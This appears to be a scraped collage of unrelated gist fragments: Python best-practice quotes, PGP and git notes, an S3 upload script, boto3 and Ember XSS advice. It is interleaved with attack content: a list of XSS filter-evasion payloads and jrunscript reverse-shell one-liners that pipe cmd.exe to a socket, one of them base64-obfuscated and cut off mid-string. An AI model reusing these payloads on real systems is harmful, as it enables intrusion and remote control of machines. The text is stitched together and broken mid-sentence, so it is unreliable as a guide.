A "Best of the Best Practices" (BOBP) guide to developing in Python.
- "Build tools for others that you want to be built for you." - Kenneth Reitz
- "Simplicity is alway better than functionality." - Pieter Hintjens
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |
I have moved this over to the Tech Interview Cheat Sheet Repo and has been expanded and even has code challenges you can run and practice against!
\
This is a guide on how to email securely.
There are many guides on how to install and use PGP to encrypt email. This is not one of them. This is a guide on secure communication using email with PGP encryption. If you are not familiar with PGP, please read another guide first. If you are comfortable using PGP to encrypt and decrypt emails, this guide will raise your security to the next level.
It's not immediately obvious how to pull down the code for a PR and test it locally. But it's pretty easy. (This assumes you have a remote for the main repo named upstream
.)
Getting the PR code
Make note of the PR number. For example, Rod's latest is PR #37: Psiphon-Labs/psiphon-tunnel-core#37
Fetch the PR's pseudo-branch (or bookmark or rev pointer whatever the word is), and give it a local branch name. Here we'll name it pr37
:
$ git fetch upstream pull/37/head:pr37
# You don't need Fog in Ruby or some other library to upload to S3 -- shell works perfectly fine | |
# This is how I upload my new Sol Trader builds (http://soltrader.net) | |
# Based on a modified script from here: http://tmont.com/blargh/2014/1/uploading-to-s3-in-bash | |
S3KEY="my aws key" | |
S3SECRET="my aws secret" # pass these in | |
function putS3 | |
{ | |
path=$1 |
This documentation aims at being a quick-straight-to-the-point-hands-on AWS resources manipulation with [boto3][0].
First of all, you'll need to install [boto3][0]. Installing it along with [awscli][1] is probably a good idea as
In Ember, always use {{...}}
, not {{{...}}}
. Use Ember.String.htmlSafe
as necessary in JavaScript (usually in a component)
to mark markup as HTML-safe. Never pass user-entered content directly to Ember.String.htmlSafe
.
Ember has great XSS protection built in. The HTMLBars templating library will automatically run any interpolations through
htmlEscape
for you. So
Nashorn / Rhino:
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V